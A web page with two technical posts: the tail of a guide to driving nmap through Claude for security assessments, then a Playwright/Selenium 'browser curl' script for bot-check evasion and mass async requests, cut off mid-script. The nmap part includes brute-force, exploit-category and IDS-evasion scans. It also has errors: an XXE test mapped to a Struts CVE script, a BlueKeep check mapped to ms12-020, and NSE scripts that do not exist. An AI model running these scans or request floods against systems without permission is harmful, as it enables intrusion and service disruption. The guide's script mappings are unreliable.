Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Identifies XXE flaws in XML parsers.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script backdoor-check,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth-bypass,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

Additional Resources

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

0
0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
  const b = path.basename(process.argv[1]);
  console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
  -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
  -d, --data DATA            Request body
  -H, --header HEADER        Add custom header (repeatable)
  -o, --output FILE          Write response body to file
  -c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
  -A, --user-agent UA        Custom User-Agent
  -t, --timeout SECONDS      Request timeout [default: 30]
      --async                Run request(s) in background
      --count N              Number of async requests to fire [default: 1, requires --async]
      --no-redirect          Do not follow redirects (best-effort)
      --show-headers         Print response headers
      --json                 Send data as JSON (sets Content-Type)
      --form                 Send data as application/x-www-form-urlencoded
  -v, --verbose              Verbose output
  -h, --help                 Show this help message
EXAMPLES:
  ${b} https://example.com
  ${b} --async https://example.com
  ${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
  ${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
  const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
  for (let i = 0; i < argv.length; i++) {
    const a = argv[i];
    switch (a) {
      case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
      case '-d': case '--data': args.data = String(argv[++i] || ''); break;
      case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
      case '-o': case '--output': args.output = String(argv[++i] || ''); break;
      case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
      case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
      case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
      case '--async': args.async = true; break;
      case '--count': args.count = Number(argv[++i] || '1'); break;
      case '--no-redirect': args.followRedirects = false; break;
      case '--show-headers': args.showHeaders = true; break;
      case '--json': args.contentType = 'application/json'; break;
      case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
      case '-v': case '--verbose': args.verbose = true; break;
      case '-h': case '--help': usage(); process.exit(0);
      default:
        if (!args.url && !a.startsWith('-')) args.url = a; else {
          console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
          process.exit(1);
        }
    }
  }
  return args;
}
function parseHeaderList(list) {
  const out = {};
  for (const h of list) {
    const idx = h.indexOf(':');
    if (idx === -1) continue;
    const name = h.slice(0, idx).trim();
    const value = h.slice(idx + 1).trim();
    if (!name) continue;
    out[name] = value;
  }
  return out;
}
function buildDefaultHeaders(userAgent) {
  const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
  return {
    'User-Agent': ua,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-User': '?1',
    'Cache-Control': 'max-age=0'
  };
}
async function performRequest(opts) {
  // Cookie file handling
  const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
  const cookieFile = opts.cookieFile || defaultCookie;
  // Launch Chromium
  const browser = await chromium.launch({ headless: true });
  const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
  if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
  const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
  // Load cookies if present
  if (fs.existsSync(cookieFile)) {
    try {
      const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
      if (ss.cookies?.length) await context.addCookies(ss.cookies);
    } catch {}
  }
  const request = context.request;
  // Build request options
  const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
  if (opts.data) {
    // Playwright will detect JSON strings vs form strings by headers
    reqOpts.data = opts.data;
  }
  if (opts.followRedirects === false) {
    // Best-effort: limit redirects to 0
    reqOpts.maxRedirects = 0;
  }
  const method = opts.method.toUpperCase();
  let resp;
  try {
    if (method === 'GET') resp = await request.get(opts.url, reqOpts);
    else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
    else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
    else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
    else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
    else {
      console.error(`${RED}Unsupported method: ${method}${NC}`);
      await browser.close();
      process.exit(2);
    }
  } catch (e) {
    console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
    await browser.close();
    process.exit(3);
  }
  // Persist cookies
  try {
    const state = await context.storageState();
    fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
  } catch {}
  // Output
  const status = resp.status();
  const statusText = resp.statusText();
  const headers = await resp.headers();
  const body = await resp.text();
  if (opts.verbose) {
    console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
    console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
  }
  if (opts.showHeaders) {
    // Print a simple status line and headers to stdout before body
    console.log(`HTTP ${status} ${statusText}`);
    for (const [k, v] of Object.entries(headers)) {
      console.log(`${k}: ${v}`);
    }
    console.log('');
  }
  if (opts.output) {
    fs.writeFileSync(opts.output, body);
  } else {
    process.stdout.write(body);
  }
  if (!resp.ok()) {
    console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
    await browser.close();
    process.exit(4);
  }
  await browser.close();
}
async function main() {
  const argv = process.argv.slice(2);
  const opts = parseArgs(argv);
  if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
  if ((opts.count || 1) > 1 && !opts.async) {
    console.error(`${RED}Error: --count requires --async${NC}`);
    process.exit(1);
  }
  if (opts.count < 1 || !Number.isInteger(opts.count)) {
    console.error(`${RED}Error: --count must be a positive integer${NC}`);
    process.exit(1);
  }
  if (opts.async) {
    // Fire-and-forget background processes
    const baseArgs = process.argv.slice(2).filter(a => a !== '--async' && !a.startsWith('--count'));
    const pids = [];
    for (let i = 0; i < opts.count; i++) {
      const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
      pids.push(child.pid);
      child.unref();
    }
    if (opts.verbose) {
      console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
    }
    if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
    else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
    process.exit(0);
  }
  await performRequest(opts);
}
main().catch(err => {
  console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
  process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
  -d "username=user&password=pass" \
  https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
  https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
  node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
  ((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=user&pass=pass" \
  "$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  "$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  --async --count 20 \
  "$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
  "https://example.com/"
  "https://example.com/"
  "https://example.com/"
)
for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
  sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
  if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o','--output')
    p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('--show-headers', action='store_true')
    p.add_argument('-t','--timeout', type=int, default=30)
    p.add_argument('-A','--user-agent')
    p.add_argument('-v','--verbose', action='store_true')
    return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
